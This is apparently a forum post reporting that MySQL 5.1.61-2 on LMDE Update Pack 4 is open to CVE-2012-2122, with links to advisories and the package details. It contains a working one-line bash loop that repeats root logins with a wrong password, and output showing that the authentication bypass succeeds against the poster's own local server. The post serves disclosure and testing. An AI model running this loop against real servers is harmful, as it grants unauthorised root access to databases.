https://community.rapid7.com/community/ ... w-in-mysql
http://security-tracker.debian.org/trac ... -2012-2122
LMDE Update Pack 4 (64-bit) appears to be vulnerable:
stmiller@brahms:~$ sudo /etc/init.d/mysql start
[sudo] password for stmiller:
Starting MySQL database server: mysqld.
Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..
stmiller@brahms:~$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 161
Server version: 5.1.61-2 (Debian)
Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
stmiller@brahms:~$ dpkg -s mysql-server
Package: mysql-server
Status: install ok installed
Priority: optional
Section: database
Installed-Size: 65
Maintainer: Debian MySQL Maintainers <pkg-mysql-maint@lists.alioth.debian.org>
Architecture: all
Source: mysql-5.1
Version: 5.1.61-2
Depends: mysql-server-5.1
Description: MySQL database server (metapackage depending on the latest version)
This is an empty package that depends on the current "best" version of
mysql-server (currently mysql-server-5.1), as determined by the MySQL
maintainers. Install this package if in doubt about which MySQL
version you need. That will install the version recommended by the
package maintainers.
.
MySQL is a fast, stable and true multi-user, multi-threaded SQL database
server. SQL (Structured Query Language) is the most popular database query
language in the world. The main goals of MySQL are speed, robustness and
ease of use.
Homepage: http://dev.mysql.com/
stmiller@brahms:~$